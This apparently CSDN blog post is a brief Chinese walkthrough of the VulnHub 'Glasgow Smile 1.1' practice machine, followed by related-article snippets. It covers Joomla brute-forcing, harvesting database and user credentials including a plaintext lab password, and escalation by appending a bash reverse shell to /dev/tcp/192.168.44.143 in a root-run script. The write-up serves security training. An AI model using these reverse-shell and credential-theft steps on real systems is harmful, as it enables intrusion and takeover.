vulhub-Glasgow Smile:1.1

最新推荐文章于 2024-06-21 11:30:02 发布
最新推荐文章于 2024-06-21 11:30:02 发布
阅读量276 收藏 6
点赞数 5
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75378806/article/details/138869472
版权

端口扫描

小丑

目录爆破

使用使用“ joomscan ”并列出版本,目录

咱们该一下/etc/host

查一下默认的账号密码(不行)

用bp爆破得到

现在是想反弹shell(我们进来是admin权限)

kali监听

咱们想先去枚举一下joomla目录下有没有有凭证密码的文件

在config.php里面发现

mysql -u joomla -p

show databases; use batjoke;

show tables; select * from taskforce;

有账号密码(base64)

???AllIHaveAreNegativeThoughts??? 解密密码

ssh连接 rob

有个help文件看看

看着像 rot13 CyberChef 解密

对密码进行”base64解码

得到用户“ abner ”的密码。

我们之前查看/etc/passwd是由abner penguin rob三个用户的,

find / -iname penguin 2>/dev/null 找与penguin有关的文件       -iname就是包含

利用abner的密码

账号:penguin,密码:scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

cat PeopleAreStartingToNotice.txt

用pspy64

结合文件内容,发现.trash_old属于用户penguin,root组并且任何人都可执行。

echo "bash -c 'bash -i >& /dev/tcp/192.168.44.143/4444 0>&1'" >> .trash_old

要记得把exit 0给用#注释

kali监听

kikifofo
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Glasgow Smile
m0_46580995的博客
10-02 311
dirb 扫描目录发现 joomla joomscan扫一下 cewl -m 5 http://192.168.1.106/joomla/ > dic-words.txt 生成字典爆破用户名密码 得到joomla Gotham 登录后把index.php改成shell 访问并得到shell 在webconfig中·发现mysql用户名密码 登录mysql 找到rob登录密码ssh登录 找到一串rot13 再base64 更换用户 去网站根目录下枚举文件 看见一个隐藏文件 开启pythonhttp服务
glasgow-can:格拉斯哥的 CAN 接口插件
05-29
易于使用Tx 和 Rx 的 LED 指示灯软件可配置 120Ω 终端,带状态 LED ESD保护硬件中的 CAN FD 支持(后续软件) 未来的计划: 每个 CAN 端口与 Glasgow(和主机)之间的隔离当小程序开始工作时,将需要树外支持(请...
transportation-xml-glasgow:格拉斯哥道路交通事件和停车场占用情况的 XML 流解析器
06-19
运输-xml-格拉斯哥 用于格拉斯哥交通事件和停车场占用情况的 XML 拉式解析器。 这将解析和提取格拉斯哥“智慧城市”数据源中的记录: 精通。 快速地。 可取消的中间解析。 由于文档被解析为流,因此内存要求低。 适用于安卓。 执照 [版权 - Alistair Rutherford 2014 - ] 根据 Apache 许可证 2.0 版(“许可证”)获得许可; 除非遵守许可,否则您不得使用此文件。 您可以在以下网址获取许可证副本 http://www.apache.org/licenses/LICENSE-2.0 除非适用法律要求或书面同意,否则根据许可分发的软件是按“原样”分发的,没有任何类型的明示或暗示的保证或条件。 请参阅许可证以了解管理许可证下的许可和限制的特定语言。
红队打靶练习:GLASGOW SMILE: 1.1
分享
02-08 902
红队打靶练习:GLASGOW SMILE: 1.1。。。joomla cms利用!pspy利用!不难!
GlasgowSmile靶机渗透记录(超全超详细适用于刚接触网安的小白们)
2301_78192136的博客
11-07 274
重新阅读文件内容,该文件以英文写成类似一封信,但一个单词都不认识,联想到凯撒密码,尝试偏移量1进行解密,得到两段文字,其中一段很容易判断出其大意,猜测其可能为正确解码内容,再对文末的base64加密内容进行解密,得到一串密码。当前计算机的登录用户有root(超管),rob,abner,penguin,sync,mysql,而sync和mysql用户可能是使用某些服务的用户,暂不考虑提权为这两个用户,所以提权目标就是rob,abner,penguin这三个账户,进一步提升为root账户。
Vulnhub-GlasgowSmile:v-1.1
cr7lyl的博客
12-25 1883
记一次vulnhub的通关过程 对主机全面扫描: 只有22和80端口开启 然后对其进行目录扫描,在扫描时访问web服务(8.
靶机实战(3):GlasgowSmile-v1.1
OneMoreThink
12-15 126
靶机网址:GlasgowSmile-v1.1[1]实战思路:主机发现端口发现(服务、组件、版本)漏洞发现(获取权限)22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)一、主机发现启动虚拟机,直接就获得了主机的IP地址。二、端口发现(服务、组件、版本)使用命令sudo -u root nmap 10.58.81.115 -n -Pn -p- --reason ...
Vulnhub GlasgowSmile靶机渗透记录
m0_43424471的博客
10-13 1225
环境配置 镜像下载地址:http://www.vulnhub.com/entry/glasgow-smile-11,491/ 目标:三个user.txt,root权限 Kali Linux IP: 192.168.1.128 GlasgowSmile IP: 192.168.1.142 信息收集 利用netdiscover进行主机发现: netdiscover -i 网卡设备名 使用nmap进行端口扫描: nmap -A -p- -sS 192.168.1.142 使用dirb对80端口
欧拉公式求圆周率的matlab代码-ProjectEuler:解决Euler项目(https://projecteuler.net/)问题的有
05-23
使用的编译器是Glasgow Haskell编译器(GHC),版本7.10.1。 Java 使用的JDK是OpenJDK,版本1.8.0。 MPL 使用的MPL版本是0.2.2。 Python 使用的Python解释器是Python 3.4.3。 帮助 电子邮件: 相关链接 如需有关所用...
glasgow:苏格兰电子军刀
05-02
格拉斯哥调试工具想要一个? 现已开始。 让我们聊天吧! 我们的IRC频道是上的 ; 我们的Discord通道是 。 重要说明:如果您想自己组装电路板,请仅使用revC1。什么是格拉斯哥? 格拉斯哥是一种用于探索数字接口的...
android-cross-ghc:尝试为针对 Android 设备的交叉编译 Glasgow Haskell Compiler (GHC) 构建脚本
07-08
此存储库包含一个构建脚本,旨在构建 (Glorious Glasgow Haskell 编译系统)版本,该版本能够编译与现有安装兼容的可执行文件。 使用此脚本构建的工具链构建的可执行文件的许可证警告 该脚本当前的工作方式涉及编译...
Android-NDK开发Crash错误定位
2401_85667530的博客
06-17 583
从上图的目录结构中可以看出来,NDK针对不同的CPU架构实现了多套相同的工具。所以在选择addr2line和objdump工具的时候,要根据你目标机器的CPU架构来选择。如果是arm架构,选择arm-linux-androidabi-4.6/4.8(一般选择高版本)。x86架构,选择x86-4.6/4.8。mipsel架构,选择mipsel-linux-android-4.6/4.8。
Android中的消息异步处理机制及实现方案
FlyingFish868的博客
06-15 1123
Android UI 是非线程安全的,即所有的 UI 操作必须在主线程中执行;任何在工作线程中直接对 UI 进行操作都会导致不可预知的行为,甚至可能导致应用崩溃;消息异步处理机制确保了所有的 UI 更新都在主线程中执行,从而保证了线程安全
android CancellationException 了解
最新发布
阿饱同学
06-21 202
Android开发中,通常是在协程或预期完成的任务被取消时遇到的异常。这种异常是Kotlin协程的一部分,也可以在各种异步任务管理库中找到。
Android 自定义View
qq_44023485的博客
06-16 967
Android 自定义View
RK3588 Android13去掉底部导航栏和修改壁纸图片
suifen_的博客
06-17 203
【代码】RK3588 Android13去掉底部导航栏和修改壁纸图片。
[BJDCTF2020]ZJCTF,不过如此1
m0_73673698的博客
06-17 690
简单分析一下这段代码,代码通过GET方法来传入text和file两个参数,并且传入的text参数通过file_get_contents函数以只读的方式打开,而且当它强等于"I have a dream"这个字符串是,才能够去输出并且去执行下面的那个if判断。也就是这段代码会遍历传入的GET参数,将GET传入的变量名给了$re,把变量名的值给了$str,那么这样在传入paylaod的时候preg_replace会变成。我们将返回的base64解码就是next.php的源码了,源码如下。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值